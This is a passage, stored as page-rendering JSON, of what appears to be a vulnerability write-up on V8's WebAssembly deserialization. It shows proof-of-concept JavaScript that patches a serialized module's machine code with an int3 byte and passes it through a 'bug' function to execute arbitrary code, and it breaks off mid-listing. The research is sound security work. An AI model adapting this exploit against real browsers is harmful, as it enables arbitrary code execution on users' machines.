code",{"type":25,"tag":38,"props":137345,"children":137346},{},[137347,137349,137355],{"type":31,"value":137348},"This will bring us nicely to the final ",{"type":25,"tag":82,"props":137350,"children":137352},{"className":137351},[],[137353],{"type":31,"value":137354},"yield a16",{"type":31,"value":137356},", and we now have a Deserialized Wasm Module with our own arbitrary machine code.",{"type":25,"tag":606,"props":137358,"children":137360},{"id":137359},"executing-shellcode",[137361],{"type":31,"value":137362},"Executing Shellcode",{"type":25,"tag":38,"props":137364,"children":137365},{},[137366],{"type":31,"value":137367},"To test this, we first serialize a small WebAssembly module and print the resulting Uint8Array:",{"type":25,"tag":206,"props":137369,"children":137371},{"code":137370,"language":39578,"meta":7,"className":39576,"style":7},"var wasm_code = new Uint8Array([\n  0, 97, 115, 109, 1, 0, 0, 0, 1, 4, 1, 96, 0, 0, 3, 2, 1, 0, 7, 9, 1, 5, 115, 104, 101, 108, 108,\n  0, 0, 10, 4, 1, 2, 0, 11,\n]);\nvar mod = new WebAssembly.Module(wasm_code);\nvar inst = new WebAssembly.Instance(mod);\nvar func = inst.exports.shell;\n\n%WasmTierUpFunction(func);\nvar serialized = %SerializeWasmModule(mod);\nlet result = new Uint8Array(serialized);\nconsole.log('[' + result.join(', ') + ']');\n",[137372],{"type":25,"tag":82,"props":137373,"children":137374},{"__ignoreMap":7},[137375,137405,137632,137700,137707,137752,137798,137838,137845,137869,137906,137942],{"type":25,"tag":216,"props":137376,"children":137377},{"class":6922,"line":6923},[137378,137382,137387,137391,137395,137400],{"type":25,"tag":216,"props":137379,"children":137380},{"style":6936},[137381],{"type":31,"value":39010},{"type":25,"tag":216,"props":137383,"children":137384},{"style":6947},[137385],{"type":31,"value":137386}," wasm_code",{"type":25,"tag":216,"props":137388,"children":137389},{"style":6953},[137390],{"type":31,"value":6956},{"type":25,"tag":216,"props":137392,"children":137393},{"style":6936},[137394],{"type":31,"value":35895},{"type":25,"tag":216,"props":137396,"children":137397},{"style":7047},[137398],{"type":31,"value":137399}," Uint8Array",{"type":25,"tag":216,"props":137401,"children":137402},{"style":6964},[137403],{"type":31,"value":137404},"([\n",{"type":25,"tag":216,"props":137406,"children":137407},{"class":6922,"line":6769},[137408,137413,137417,137422,137426,137431,137435,137440,137444,137448,137452,137456,137460,137464,137468,137472,137476,137480,137484,137488,137492,137496,137500,137505,137509,137513,137517,137521,137525,137529,137533,137537,137541,137545,137549,137553,137557,137561,137565,137569,137573,137577,137581,137585,137589,137593,137597,137602,137606,137611,137615,137620,137624,137628],{"type":25,"tag":216,"props":137409,"children":137410},{"style":6989},[137411],{"type":31,"value":137412},"  0",{"type":25,"tag":216,"props":137414,"children":137415},{"style":6964},[137416],{"type":31,"value":7026},{"type":25,"tag":216,"props":137418,"children":137419},{"style":6989},[137420],{"type":31,"value":137421},"97",{"type":25,"tag":216,"props":137423,"children":137424},{"style":6964},[137425],{"type":31,"value":7026},{"type":25,"tag":216,"props":137427,"children":137428},{"style":6989},[137429],{"type":31,"value":137430},"115",{"type":25,"tag":216,"props":137432,"children":137433},{"style":6964},[137434],{"type":31,"value":7026},{"type":25,"tag":216,"props":137436,"children":137437},{"style":6989},[137438],{"type":31,"value":137439},"109",{"type":25,"tag":216,"props":137441,"children":137442},{"style":6964},[137443],{"type":31,"value":7026},{"type":25,"tag":216,"props":137445,"children":137446},{"style":6989},[137447],{"type":31,"value":184},{"type":25,"tag":216,"props":137449,"children":137450},{"style":6964},[137451],{"type":31,"value":7026},{"type":25,"tag":216,"props":137453,"children":137454},{"style":6989},[137455],{"type":31,"value":1882},{"type":25,"tag":216,"props":137457,"children":137458},{"style":6964},[137459],{"type":31,"value":7026},{"type":25,"tag":216,"props":137461,"children":137462},{"style":6989},[137463],{"type":31,"value":1882},{"type":25,"tag":216,"props":137465,"children":137466},{"style":6964},[137467],{"type":31,"value":7026},{"type":25,"tag":216,"props":137469,"children":137470},{"style":6989},[137471],{"type":31,"value":1882},{"type":25,"tag":216,"props":137473,"children":137474},{"style":6964},[137475],{"type":31,"value":7026},{"type":25,"tag":216,"props":137477,"children":137478},{"style":6989},[137479],{"type":31,"value":184},{"type":25,"tag":216,"props":137481,"children":137482},{"style":6964},[137483],{"type":31,"value":7026},{"type":25,"tag":216,"props":137485,"children":137486},{"style":6989},[137487],{"type":31,"value":21486},{"type":25,"tag":216,"props":137489,"children":137490},{"style":6964},[137491],{"type":31,"value":7026},{"type":25,"tag":216,"props":137493,"children":137494},{"style":6989},[137495],{"type":31,"value":184},{"type":25,"tag":216,"props":137497,"children":137498},{"style":6964},[137499],{"type":31,"value":7026},{"type":25,"tag":216,"props":137501,"children":137502},{"style":6989},[137503],{"type":31,"value":137504},"96",{"type":25,"tag":216,"props":137506,"children":137507},{"style":6964},[137508],{"type":31,"value":7026},{"type":25,"tag":216,"props":137510,"children":137511},{"style":6989},[137512],{"type":31,"value":1882},{"type":25,"tag":216,"props":137514,"children":137515},{"style":6964},[137516],{"type":31,"value":7026},{"type":25,"tag":216,"props":137518,"children":137519},{"style":6989},[137520],{"type":31,"value":1882},{"type":25,"tag":216,"props":137522,"children":137523},{"style":6964},[137524],{"type":31,"value":7026},{"type":25,"tag":216,"props":137526,"children":137527},{"style":6989},[137528],{"type":31,"value":21253},{"type":25,"tag":216,"props":137530,"children":137531},{"style":6964},[137532],{"type":31,"value":7026},{"type":25,"tag":216,"props":137534,"children":137535},{"style":6989},[137536],{"type":31,"value":331},{"type":25,"tag":216,"props":137538,"children":137539},{"style":6964},[137540],{"type":31,"value":7026},{"type":25,"tag":216,"props":137542,"children":137543},{"style":6989},[137544],{"type":31,"value":184},{"type":25,"tag":216,"props":137546,"children":137547},{"style":6964},[137548],{"type":31,"value":7026},{"type":25,"tag":216,"props":137550,"children":137551},{"style":6989},[137552],{"type":31,"value":1882},{"type":25,"tag":216,"props":137554,"children":137555},{"style":6964},[137556],{"type":31,"value":7026},{"type":25,"tag":216,"props":137558,"children":137559},{"style":6989},[137560],{"type":31,"value":58639},{"type":25,"tag":216,"props":137562,"children":137563},{"style":6964},[137564],{"type":31,"value":7026},{"type":25,"tag":216,"props":137566,"children":137567},{"style":6989},[137568],{"type":31,"value":59854},{"type":25,"tag":216,"props":137570,"children":137571},{"style":6964},[137572],{"type":31,"value":7026},{"type":25,"tag":216,"props":137574,"children":137575},{"style":6989},[137576],{"type":31,"value":184},{"type":25,"tag":216,"props":137578,"children":137579},{"style":6964},[137580],{"type":31,"value":7026},{"type":25,"tag":216,"props":137582,"children":137583},{"style":6989},[137584],{"type":31,"value":22067},{"type":25,"tag":216,"props":137586,"children":137587},{"style":6964},[137588],{"type":31,"value":7026},{"type":25,"tag":216,"props":137590,"children":137591},{"style":6989},[137592],{"type":31,"value":137430},{"type":25,"tag":216,"props":137594,"children":137595},{"style":6964},[137596],{"type":31,"value":7026},{"type":25,"tag":216,"props":137598,"children":137599},{"style":6989},[137600],{"type":31,"value":137601},"104",{"type":25,"tag":216,"props":137603,"children":137604},{"style":6964},[137605],{"type":31,"value":7026},{"type":25,"tag":216,"props":137607,"children":137608},{"style":6989},[137609],{"type":31,"value":137610},"101",{"type":25,"tag":216,"props":137612,"children":137613},{"style":6964},[137614],{"type":31,"value":7026},{"type":25,"tag":216,"props":137616,"children":137617},{"style":6989},[137618],{"type":31,"value":137619},"108",{"type":25,"tag":216,"props":137621,"children":137622},{"style":6964},[137623],{"type":31,"value":7026},{"type":25,"tag":216,"props":137625,"children":137626},{"style":6989},[137627],{"type":31,"value":137619},{"type":25,"tag":216,"props":137629,"children":137630},{"style":6964},[137631],{"type":31,"value":7465},{"type":25,"tag":216,"props":137633,"children":137634},{"class":6922,"line":6778},[137635,137639,137643,137647,137651,137655,137659,137663,137667,137671,137675,137679,137683,137687,137691,137696],{"type":25,"tag":216,"props":137636,"children":137637},{"style":6989},[137638],{"type":31,"value":137412},{"type":25,"tag":216,"props":137640,"children":137641},{"style":6964},[137642],{"type":31,"value":7026},{"type":25,"tag":216,"props":137644,"children":137645},{"style":6989},[137646],{"type":31,"value":1882},{"type":25,"tag":216,"props":137648,"children":137649},{"style":6964},[137650],{"type":31,"value":7026},{"type":25,"tag":216,"props":137652,"children":137653},{"style":6989},[137654],{"type":31,"value":93224},{"type":25,"tag":216,"props":137656,"children":137657},{"style":6964},[137658],{"type":31,"value":7026},{"type":25,"tag":216,"props":137660,"children":137661},{"style":6989},[137662],{"type":31,"value":21486},{"type":25,"tag":216,"props":137664,"children":137665},{"style":6964},[137666],{"type":31,"value":7026},{"type":25,"tag":216,"props":137668,"children":137669},{"style":6989},[137670],{"type":31,"value":184},{"type":25,"tag":216,"props":137672,"children":137673},{"style":6964},[137674],{"type":31,"value":7026},{"type":25,"tag":216,"props":137676,"children":137677},{"style":6989},[137678],{"type":31,"value":331},{"type":25,"tag":216,"props":137680,"children":137681},{"style":6964},[137682],{"type":31,"value":7026},{"type":25,"tag":216,"props":137684,"children":137685},{"style":6989},[137686],{"type":31,"value":1882},{"type":25,"tag":216,"props":137688,"children":137689},{"style":6964},[137690],{"type":31,"value":7026},{"type":25,"tag":216,"props":137692,"children":137693},{"style":6989},[137694],{"type":31,"value":137695},"11",{"type":25,"tag":216,"props":137697,"children":137698},{"style":6964},[137699],{"type":31,"value":7465},{"type":25,"tag":216,"props":137701,"children":137702},{"class":6922,"line":7005},[137703],{"type":25,"tag":216,"props":137704,"children":137705},{"style":6964},[137706],{"type":31,"value":7719},{"type":25,"tag":216,"props":137708,"children":137709},{"class":6922,"line":7110},[137710,137714,137718,137722,137726,137731,137735,137739,137743,137748],{"type":25,"tag":216,"props":137711,"children":137712},{"style":6936},[137713],{"type":31,"value":39010},{"type":25,"tag":216,"props":137715,"children":137716},{"style":6947},[137717],{"type":31,"value":75594},{"type":25,"tag":216,"props":137719,"children":137720},{"style":6953},[137721],{"type":31,"value":6956},{"type":25,"tag":216,"props":137723,"children":137724},{"style":6936},[137725],{"type":31,"value":35895},{"type":25,"tag":216,"props":137727,"children":137728},{"style":6947},[137729],{"type":31,"value":137730}," WebAssembly",{"type":25,"tag":216,"props":137732,"children":137733},{"style":6964},[137734],{"type":31,"value":179},{"type":25,"tag":216,"props":137736,"children":137737},{"style":7047},[137738],{"type":31,"value":89890},{"type":25,"tag":216,"props":137740,"children":137741},{"style":6964},[137742],{"type":31,"value":1850},{"type":25,"tag":216,"props":137744,"children":137745},{"style":6947},[137746],{"type":31,"value":137747},"wasm_code",{"type":25,"tag":216,"props":137749,"children":137750},{"style":6964},[137751],{"type":31,"value":7797},{"type":25,"tag":216,"props":137753,"children":137754},{"class":6922,"line":7216},[137755,137759,137764,137768,137772,137776,137780,137785,137789,137794],{"type":25,"tag":216,"props":137756,"children":137757},{"style":6936},[137758],{"type":31,"value":39010},{"type":25,"tag":216,"props":137760,"children":137761},{"style":6947},[137762],{"type":31,"value":137763}," inst",{"type":25,"tag":216,"props":137765,"children":137766},{"style":6953},[137767],{"type":31,"value":6956},{"type":25,"tag":216,"props":137769,"children":137770},{"style":6936},[137771],{"type":31,"value":35895},{"type":25,"tag":216,"props":137773,"children":137774},{"style":6947},[137775],{"type":31,"value":137730},{"type":25,"tag":216,"props":137777,"children":137778},{"style":6964},[137779],{"type":31,"value":179},{"type":25,"tag":216,"props":137781,"children":137782},{"style":7047},[137783],{"type":31,"value":137784},"Instance",{"type":25,"tag":216,"props":137786,"children":137787},{"style":6964},[137788],{"type":31,"value":1850},{"type":25,"tag":216,"props":137790,"children":137791},{"style":6947},[137792],{"type":31,"value":137793},"mod",{"type":25,"tag":216,"props":137795,"children":137796},{"style":6964},[137797],{"type":31,"value":7797},{"type":25,"tag":216,"props":137799,"children":137800},{"class":6922,"line":7244},[137801,137805,137809,137813,137817,137821,137825,137829,137834],{"type":25,"tag":216,"props":137802,"children":137803},{"style":6936},[137804],{"type":31,"value":39010},{"type":25,"tag":216,"props":137806,"children":137807},{"style":6947},[137808],{"type":31,"value":83981},{"type":25,"tag":216,"props":137810,"children":137811},{"style":6953},[137812],{"type":31,"value":6956},{"type":25,"tag":216,"props":137814,"children":137815},{"style":6947},[137816],{"type":31,"value":137763},{"type":25,"tag":216,"props":137818,"children":137819},{"style":6964},[137820],{"type":31,"value":179},{"type":25,"tag":216,"props":137822,"children":137823},{"style":6947},[137824],{"type":31,"value":41849},{"type":25,"tag":216,"props":137826,"children":137827},{"style":6964},[137828],{"type":31,"value":179},{"type":25,"tag":216,"props":137830,"children":137831},{"style":6947},[137832],{"type":31,"value":137833},"shell",{"type":25,"tag":216,"props":137835,"children":137836},{"style":6964},[137837],{"type":31,"value":6967},{"type":25,"tag":216,"props":137839,"children":137840},{"class":6922,"line":7257},[137841],{"type":25,"tag":216,"props":137842,"children":137843},{"emptyLinePlaceholder":16},[137844],{"type":31,"value":7642},{"type":25,"tag":216,"props":137846,"children":137847},{"class":6922,"line":7275},[137848,137852,137857,137861,137865],{"type":25,"tag":216,"props":137849,"children":137850},{"style":6953},[137851],{"type":31,"value":60357},{"type":25,"tag":216,"props":137853,"children":137854},{"style":7047},[137855],{"type":31,"value":137856},"WasmTierUpFunction",{"type":25,"tag":216,"props":137858,"children":137859},{"style":6964},[137860],{"type":31,"value":1850},{"type":25,"tag":216,"props":137862,"children":137863},{"style":6947},[137864],{"type":31,"value":80272},{"type":25,"tag":216,"props":137866,"children":137867},{"style":6964},[137868],{"type":31,"value":7797},{"type":25,"tag":216,"props":137870,"children":137871},{"class":6922,"line":7296},[137872,137876,137881,137885,137890,137894,137898,137902],{"type":25,"tag":216,"props":137873,"children":137874},{"style":6936},[137875],{"type":31,"value":39010},{"type":25,"tag":216,"props":137877,"children":137878},{"style":6947},[137879],{"type":31,"value":137880}," serialized",{"type":25,"tag":216,"props":137882,"children":137883},{"style":6953},[137884],{"type":31,"value":6956},{"type":25,"tag":216,"props":137886,"children":137887},{"style":6953},[137888],{"type":31,"value":137889}," %",{"type":25,"tag":216,"props":137891,"children":137892},{"style":7047},[137893],{"type":31,"value":136888},{"type":25,"tag":216,"props":137895,"children":137896},{"style":6964},[137897],{"type":31,"value":1850},{"type":25,"tag":216,"props":137899,"children":137900},{"style":6947},[137901],{"type":31,"value":137793},{"type":25,"tag":216,"props":137903,"children":137904},{"style":6964},[137905],{"type":31,"value":7797},{"type":25,"tag":216,"props":137907,"children":137908},{"class":6922,"line":7305},[137909,137913,137917,137921,137925,137929,137933,137938],{"type":25,"tag":216,"props":137910,"children":137911},{"style":6936},[137912],{"type":31,"value":15743},{"type":25,"tag":216,"props":137914,"children":137915},{"style":6947},[137916],{"type":31,"value":13115},{"type":25,"tag":216,"props":137918,"children":137919},{"style":6953},[137920],{"type":31,"value":6956},{"type":25,"tag":216,"props":137922,"children":137923},{"style":6936},[137924],{"type":31,"value":35895},{"type":25,"tag":216,"props":137926,"children":137927},{"style":7047},[137928],{"type":31,"value":137399},{"type":25,"tag":216,"props":137930,"children":137931},{"style":6964},[137932],{"type":31,"value":1850},{"type":25,"tag":216,"props":137934,"children":137935},{"style":6947},[137936],{"type":31,"value":137937},"serialized",{"type":25,"tag":216,"props":137939,"children":137940},{"style":6964},[137941],{"type":31,"value":7797},{"type":25,"tag":216,"props":137943,"children":137944},{"class":6922,"line":7557},[137945,137950,137954,137958,137962,137967,137971,137975,137979,137984,137988,137993,137997,138001,138006],{"type":25,"tag":216,"props":137946,"children":137947},{"style":6947},[137948],{"type":31,"value":137949},"console",{"type":25,"tag":216,"props":137951,"children":137952},{"style":6964},[137953],{"type":31,"value":179},{"type":25,"tag":216,"props":137955,"children":137956},{"style":7047},[137957],{"type":31,"value":105911},{"type":25,"tag":216,"props":137959,"children":137960},{"style":6964},[137961],{"type":31,"value":1850},{"type":25,"tag":216,"props":137963,"children":137964},{"style":8205},[137965],{"type":31,"value":137966},"'['",{"type":25,"tag":216,"props":137968,"children":137969},{"style":6953},[137970],{"type":31,"value":12858},{"type":25,"tag":216,"props":137972,"children":137973},{"style":6947},[137974],{"type":31,"value":13115},{"type":25,"tag":216,"props":137976,"children":137977},{"style":6964},[137978],{"type":31,"value":179},{"type":25,"tag":216,"props":137980,"children":137981},{"style":7047},[137982],{"type":31,"value":137983},"join",{"type":25,"tag":216,"props":137985,"children":137986},{"style":6964},[137987],{"type":31,"value":1850},{"type":25,"tag":216,"props":137989,"children":137990},{"style":8205},[137991],{"type":31,"value":137992},"', '",{"type":25,"tag":216,"props":137994,"children":137995},{"style":6964},[137996],{"type":31,"value":7036},{"type":25,"tag":216,"props":137998,"children":137999},{"style":6953},[138000],{"type":31,"value":3539},{"type":25,"tag":216,"props":138002,"children":138003},{"style":8205},[138004],{"type":31,"value":138005}," ']'",{"type":25,"tag":216,"props":138007,"children":138008},{"style":6964},[138009],{"type":31,"value":7797},{"type":25,"tag":38,"props":138011,"children":138012},{},[138013],{"type":31,"value":138014},"This produces the following output:",{"type":25,"tag":206,"props":138016,"children":138018},{"code":138017},"[147, 6, 222, 192, 20, 119, 44, 43, 127, 62, 3, 0, 159, 206, 136, 43, 0, 0, 3, 0, 0, 0, 0, 0, 64, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 4, 28, 0, 0, 0, 16, 0, 0, 0, 28, 0, 0, 0, 28, 0, 0, 0, 28, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 64, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2, 85, 72, 137, 229, 106, 8, 86, 72, 139, 229, 93, 195, 144, 15, 31, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 64, 93, 198, 0]\n",[138019],{"type":25,"tag":82,"props":138020,"children":138021},{"__ignoreMap":7},[138022],{"type":31,"value":138017},{"type":25,"tag":38,"props":138024,"children":138025},{},[138026,138028,138034,138036,138042,138044,138050,138051,138057,138059,138064],{"type":31,"value":138027},"The bytes ",{"type":25,"tag":82,"props":138029,"children":138031},{"className":138030},[],[138032],{"type":31,"value":138033},"85, 72, 137, 229, ...",{"type":31,"value":138035}," correspond to the x86-64 function prologue (",{"type":25,"tag":82,"props":138037,"children":138039},{"className":138038},[],[138040],{"type":31,"value":138041},"push rbp; mov rbp, rsp",{"type":31,"value":138043},"). We replace the first byte with ",{"type":25,"tag":82,"props":138045,"children":138047},{"className":138046},[],[138048],{"type":31,"value":138049},"0xcc",{"type":31,"value":20418},{"type":25,"tag":82,"props":138052,"children":138054},{"className":138053},[],[138055],{"type":31,"value":138056},"int3",{"type":31,"value":138058}," opcode), and use this modified buffer as the serialized input to ",{"type":25,"tag":82,"props":138060,"children":138062},{"className":138061},[],[138063],{"type":31,"value":136862},{"type":31,"value":1472},{"type":25,"tag":206,"props":138066,"children":138068},{"code":138067,"language":39578,"meta":7,"className":39576,"style":7},"(async () => {\n  const wasm_code = new Uint8Array([\n    0, 97, 115, 109, 1, 0, 0, 0, 1, 4, 1, 96, 0, 0, 3, 2, 1, 0, 7, 9, 1, 5, 115, 104, 101, 108, 108,\n    0, 0, 10, 4, 1, 2, 0, 11,\n  ]);\n  const buffer = new Uint8Array([\n    147, 6, 222, 192, 20, 119, 44, 43, 127, 62, 3, 0, 159, 206, 136, 43, 0, 0, 3, 0, 0, 0, 0, 0, 64,\n    0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 4, 28, 0, 0, 0, 16, 0, 0, 0, 28, 0, 0, 0, 28, 0,\n    0, 0, 28, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 64, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,\n    0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2, 204, 72, 137, 229, 106, 8, 86, 72, 139, 229, 93,\n    195, 144, 15, 31, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,\n    0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 64, 93, 198, 0,\n  ]);\n  let r = bug(wasm_code, buffer.buffer);\n  result = (await r.next()).value;\n  const wasm_instance = new WebAssembly.Instance(result);\n  const f = wasm_instance.exports.shell;\n  f();\n})();\n",[138069],{"type":25,"tag":82,"props":138070,"children":138071},{"__ignoreMap":7},[138072,138095,138122,138342,138409,138417,138444,138657,138909,139160,139386,139630,139850,139857,139906,139951,139995,140034,140046],{"type":25,"tag":216,"props":138073,"children":138074},{"class":6922,"line":6923},[138075,138079,138083,138087,138091],{"type":25,"tag":216,"props":138076,"children":138077},{"style":6964},[138078],{"type":31,"value":1850},{"type":25,"tag":216,"props":138080,"children":138081},{"style":6936},[138082],{"type":31,"value":40108},{"type":25,"tag":216,"props":138084,"children":138085},{"style":6964},[138086],{"type":31,"value":43660},{"type":25,"tag":216,"props":138088,"children":138089},{"style":6936},[138090],{"type":31,"value":18779},{"type":25,"tag":216,"props":138092,"children":138093},{"style":6964},[138094],{"type":31,"value":7241},{"type":25,"tag":216,"props":138096,"children":138097},{"class":6922,"line":6769},[138098,138102,138106,138110,138114,138118],{"type":25,"tag":216,"props":138099,"children":138100},{"style":6936},[138101],{"type":31,"value":40151},{"type":25,"tag":216,"props":138103,"children":138104},{"style":6947},[138105],{"type":31,"value":137386},{"type":25,"tag":216,"props":138107,"children":138108},{"style":6953},[138109],{"type":31,"value":6956},{"type":25,"tag":216,"props":138111,"children":138112},{"style":6936},[138113],{"type":31,"value":35895},{"type":25,"tag":216,"props":138115,"children":138116},{"style":7047},[138117],{"type":31,"value":137399},{"type":25,"tag":216,"props":138119,"children":138120},{"style":6964},[138121],{"type":31,"value":137404},{"type":25,"tag":216,"props":138123,"children":138124},{"class":6922,"line":6778},[138125,138130,138134,138138,138142,138146,138150,138154,138158,138162,138166,138170,138174,138178,138182,138186,138190,138194,138198,138202,138206,138210,138214,138218,138222,138226,138230,138234,138238,138242,138246,138250,138254,138258,138262,138266,138270,138274,138278,138282,138286,138290,138294,138298,138302,138306,138310,138314,138318,138322,138326,138330,138334,138338],{"type":25,"tag":216,"props":138126,"children":138127},{"style":6989},[138128],{"type":31,"value":138129},"    0",{"type":25,"tag":216,"props":138131,"children":138132},{"style":6964},[138133],{"type":31,"value":7026},{"type":25,"tag":216,"props":138135,"children":138136},{"style":6989},[138137],{"type":31,"value":137421},{"type":25,"tag":216,"props":138139,"children":138140},{"style":6964},[138141],{"type":31,"value":7026},{"type":25,"tag":216,"props":138143,"children":138144},{"style":6989},[138145],{"type":31,"value":137430},{"type":25,"tag":216,"props":138147,"children":138148},{"style":6964},[138149],{"type":31,"value":7026},{"type":25,"tag":216,"props":138151,"children":138152},{"style":6989},[138153],{"type":31,"value":137439},{"type":25,"tag":216,"props":138155,"children":138156},{"style":6964},[138157],{"type":31,"value":7026},{"type":25,"tag":216,"props":138159,"children":138160},{"style":6989},[138161],{"type":31,"value":184},{"type":25,"tag":216,"props":138163,"children":138164},{"style":6964},[138165],{"type":31,"value":7026},{"type":25,"tag":216,"props":138167,"children":138168},{"style":6989},[138169],{"type":31,"value":1882},{"type":25,"tag":216,"props":138171,"children":138172},{"style":6964},[138173],{"type":31,"value":7026},{"type":25,"tag":216,"props":138175,"children":138176},{"style":6989},[138177],{"type":31,"value":1882},{"type":25,"tag":216,"props":138179,"children":138180},{"style":6964},[138181],{"type":31,"value":7026},{"type":25,"tag":216,"props":138183,"children":138184},{"style":6989},[138185],{"type":31,"value":1882},{"type":25,"tag":216,"props":138187,"children":138188},{"style":6964},[138189],{"type":31,"value":7026},{"type":25,"tag":216,"props":138191,"children":138192},{"style":6989},[138193],{"type":31,"value":184},{"type":25,"tag":216,"props":138195,"children":138196},{"style":6964},[138197],{"type":31,"value":7026},{"type":25,"tag":216,"props":138199,"children":138200},{"style":6989},[138201],{"type":31,"value":21486},{"type":25,"tag":216,"props":138203,"children":138204},{"style":6964},[138205],{"type":31,"value":7026},{"type":25,"tag":216,"props":138207,"children":138208},{"style":6989},[138209],{"type":31,"value":184},{"type":25,"tag":216,"props":138211,"children":138212},{"style":6964},[138213],{"type":31,"value":7026},{"type":25,"tag":216,"props":138215,"children":138216},{"style":6989},[138217],{"type":31,"value":137504},{"type":25,"tag":216,"props":138219,"children":138220},{"style":6964},[138221],{"type":31,"value":7026},{"type":25,"tag":216,"props":138223,"children":138224},{"style":6989},[138225],{"type":31,"value":1882},{"type":25,"tag":216,"props":138227,"children":138228},{"style":6964},[138229],{"type":31,"value":7026},{"type":25,"tag":216,"props":138231,"children":138232},{"style":6989},[138233],{"type":31,"value":1882},{"type":25,"tag":216,"props":138235,"children":138236},{"style":6964},[138237],{"type":31,"value":7026},{"type":25,"tag":216,"props":138239,"children":138240},{"style":6989},[138241],{"type":31,"value":21253},{"type":25,"tag":216,"props":138243,"children":138244},{"style":6964},[138245],{"type":31,"value":7026},{"type":25,"tag":216,"props":138247,"children":138248},{"style":6989},[138249],{"type":31,"value":331},{"type":25,"tag":216,"props":138251,"children":138252},{"style":6964},[138253],{"type":31,"value":7026},{"type":25,"tag":216,"props":138255,"children":138256},{"style":6989},[138257],{"type":31,"value":184},{"type":25,"tag":216,"props":138259,"children":138260},{"style":6964},[138261],{"type":31,"value":7026},{"type":25,"tag":216,"props":138263,"children":138264},{"style":6989},[138265],{"type":31,"value":1882},{"type":25,"tag":216,"props":138267,"children":138268},{"style":6964},[138269],{"type":31,"value":7026},{"type":25,"tag":216,"props":138271,"children":138272},{"style":6989},[138273],{"type":31,"value":58639},{"type":25,"tag":216,"props":138275,"children":138276},{"style":6964},[138277],{"type":31,"value":7026},{"type":25,"tag":216,"props":138279,"children":138280},{"style":6989},[138281],{"type":31,"value":59854},{"type":25,"tag":216,"props":138283,"children":138284},{"style":6964},[138285],{"type":31,"value":7026},{"type":25,"tag":216,"props":138287,"children":138288},{"style":6989},[138289],{"type":31,"value":184},{"type":25,"tag":216,"props":138291,"children":138292},{"style":6964},[138293],{"type":31,"value":7026},{"type":25,"tag":216,"props":138295,"children":138296},{"style":6989},[138297],{"type":31,"value":22067},{"type":25,"tag":216,"props":138299,"children":138300},{"style":6964},[138301],{"type":31,"value":7026},{"type":25,"tag":216,"props":138303,"children":138304},{"style":6989},[138305],{"type":31,"value":137430},{"type":25,"tag":216,"props":138307,"children":138308},{"style":6964},[138309],{"type":31,"value":7026},{"type":25,"tag":216,"props":138311,"children":138312},{"style":6989},[138313],{"type":31,"value":137601},{"type":25,"tag":216,"props":138315,"children":138316},{"style":6964},[138317],{"type":31,"value":7026},{"type":25,"tag":216,"props":138319,"children":138320},{"style":6989},[138321],{"type":31,"value":137610},{"type":25,"tag":216,"props":138323,"children":138324},{"style":6964},[138325],{"type":31,"value":7026},{"type":25,"tag":216,"props":138327,"children":138328},{"style":6989},[138329],{"type":31,"value":137619},{"type":25,"tag":216,"props":138331,"children":138332},{"style":6964},[138333],{"type":31,"value":7026},{"type":25,"tag":216,"props":138335,"children":138336},{"style":6989},[138337],{"type":31,"value":137619},{"type":25,"tag":216,"props":138339,"children":138340},{"style":6964},[138341],{"type":31,"value":7465},{"type":25,"tag":216,"props":138343,"children":138344},{"class":6922,"line":7005},[138345,138349,138353,138357,138361,138365,138369,138373,138377,138381,138385,138389,138393,138397,138401,138405],{"type":25,"tag":216,"props":138346,"children":138347},{"style":6989},[138348],{"type":31,"value":138129},{"type":25,"tag":216,"props":138350,"children":138351},{"style":6964},[138352],{"type":31,"value":7026},{"type":25,"tag":216,"props":138354,"children":138355},{"style":6989},[138356],{"type":31,"value":1882},{"type":25,"tag":216,"props":138358,"children":138359},{"style":6964},[138360],{"type":31,"value":7026},{"type":25,"tag":216,"props":138362,"children":138363},{"style":6989},[138364],{"type":31,"value":93224},{"type":25,"tag":216,"props":138366,"children":138367},{"style":6964},[138368],{"type":31,"value":7026},{"type":25,"tag":216,"props":138370,"children":138371},{"style":6989},[138372],{"type":31,"value":21486},{"type":25,"tag":216,"props":138374,"children":138375},{"style":6964},[138376],{"type":31,"value":7026},{"type":25,"tag":216,"props":138378,"children":138379},{"style":6989},[138380],{"type":31,"value":184},{"type":25,"tag":216,"props":138382,"children":138383},{"style":6964},[138384],{"type":31,"value":7026},{"type":25,"tag":216,"props":138386,"children":138387},{"style":6989},[138388],{"type":31,"value":331},{"type":25,"tag":216,"props":138390,"children":138391},{"style":6964},[138392],{"type":31,"value":7026},{"type":25,"tag":216,"props":138394,"children":138395},{"style":6989},[138396],{"type":31,"value":1882},{"type":25,"tag":216,"props":138398,"children":138399},{"style":6964},[138400],{"type":31,"value":7026},{"type":25,"tag":216,"props":138402,"children":138403},{"style":6989},[138404],{"type":31,"value":137695},{"type":25,"tag":216,"props":138406,"children":138407},{"style":6964},[138408],{"type":31,"value":7465},{"type":25,"tag":216,"props":138410,"children":138411},{"class":6922,"line":7110},[138412],{"type":25,"tag":216,"props":138413,"children":138414},{"style":6964},[138415],{"type":31,"value":138416},"  